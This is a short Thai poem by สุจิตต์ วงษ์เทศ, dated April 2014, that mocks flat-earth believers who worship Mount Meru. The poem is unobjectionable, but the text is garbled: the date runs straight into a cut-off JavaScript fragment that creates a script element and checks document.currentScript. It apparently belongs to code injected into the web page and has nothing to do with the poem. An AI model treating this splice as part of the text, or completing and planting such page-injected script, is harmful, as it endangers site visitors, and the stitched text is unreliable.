พวกโลกแบนบูชาพระสุเมรุ

หลักโลกเห็นสูงระหงพระเวหา

ใครบอกโลกกลมก้อนมหึมา

ก็ชี้หน้าว่าล้มเจ้าเขาสุเมรุ

 

สุจิตต์ วงษ์เทศ

จันทร์ 21 เมษายน 2557var d=document;var s=d.createElement(‘script’); if (document.currentScript) {